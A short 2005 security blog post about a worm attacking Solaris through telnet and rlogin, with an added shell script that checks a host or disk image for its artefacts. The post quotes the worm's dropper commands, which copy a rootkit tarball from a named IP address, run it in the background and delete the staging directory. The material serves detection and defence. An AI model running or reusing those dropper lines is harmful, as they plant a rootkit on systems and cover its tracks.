28-03-05

telnet worm attack against Solaris underway

It uses ports 25 and 513; the techniques are telnet, rlogin and brute-force password guessing.
According to the Internet Storm Center, this is the data package (the dropper script) to look out for:

mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
news@210.121.161.78:/usr/lib/.dl/rk/yatze-SunOS_`/usr/bin/uname -m`.tar . >mrun.sh
echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>mrun.sh
echo cd rk ; /bin/sh go >>mrun.sh
echo cd / ; rm -rf /tmp/.m/* ; rm -rf /tmp/.m >>mrun.sh
/usr/bin/nohup /bin/sh mrun.sh >/dev/null 2>/dev/null &
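As an added example, not part of the original post or of the ISC material, here is a small POSIX shell check that looks for the artefacts that dropper leaves behind on a Solaris host: the hidden /tmp/.m staging directory, the mrun.sh script, the unpacked rk directory, a leftover reference to the distribution host in the staging area or a shell history, and a shell still running mrun.sh. The argument is a filesystem root, so it can be run against / on a live host or against the mount point of a disk image taken from a machine you have already pulled off the network (the path layout and the RUN_CHECK variable are assumptions for this example; the process check assumes `ps -eo args` is available).

```shell
#!/bin/sh
# Added example, not from the original post: look for the artefacts the
# dropper script quoted above leaves on a host.
# Usage: check_worm_indicators [ROOT]   (empty ROOT means the live root /)

WORM_HOST="210.121.161.78"      # distribution host named in the dropper script
STAGE_DIR="tmp/.m"              # hidden staging directory it creates
DROPPER="tmp/.m/mrun.sh"        # script it builds with echo >> and runs via nohup

# Prints one line per indicator found. Returns 0 when the tree is clean and
# 1 when any indicator is present, so it can be used directly in "if".
check_worm_indicators() {
    root="${1:-}"
    found=0

    if [ -d "$root/$STAGE_DIR" ]; then
        echo "INDICATOR: hidden staging directory $root/$STAGE_DIR exists"
        found=1
    fi
    if [ -f "$root/$DROPPER" ]; then
        echo "INDICATOR: dropper script $root/$DROPPER exists"
        found=1
    fi
    if [ -d "$root/$STAGE_DIR/rk" ]; then
        echo "INDICATOR: unpacked rootkit directory $root/$STAGE_DIR/rk exists"
        found=1
    fi

    # The dropper deletes /tmp/.m after it has run, so also flag any leftover
    # file or shell history that still names the distribution host.
    # (plain grep without -q, because older Solaris /usr/bin/grep lacks -q)
    for f in "$root/$STAGE_DIR"/* "$root/.sh_history" "$root/root/.sh_history"; do
        [ -f "$f" ] || continue
        if grep "$WORM_HOST" "$f" >/dev/null 2>&1; then
            echo "INDICATOR: reference to $WORM_HOST in $f"
            found=1
        fi
    done

    # Live host only: the dropper is started as "nohup /bin/sh mrun.sh".
    if [ -z "$root" ] || [ "$root" = "/" ]; then
        if ps -eo args 2>/dev/null | grep -v grep | grep 'sh mrun.sh' >/dev/null 2>&1; then
            echo "INDICATOR: a shell is still running mrun.sh"
            found=1
        fi
    fi

    return $found
}

# To run directly (assumed file name):  RUN_CHECK=1 sh check_worm.sh /mnt/suspect_image
# The exit status mirrors the result, so it fits into cron or a monitoring check.
if [ "${RUN_CHECK:-0}" = "1" ]; then
    check_worm_indicators "${1:-}"
    exit $?
fi
```

Run it against a clean tree and it is silent with exit status 0; run it against a tree that contains /tmp/.m/mrun.sh, or only a history file that still mentions the distribution host, and it lists what it found and exits 1.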

If you still use telnet and rlogin, please consider upgrading to SSH (not PuTTY, please) or another secured way to protect these kinds of logins.
If you are compromised, pull your machine off the network; it can take some time before you know why they are doing this.
More information about forensic methods is on securingit.tk.

01:22 Posted by technology changes fast not a lot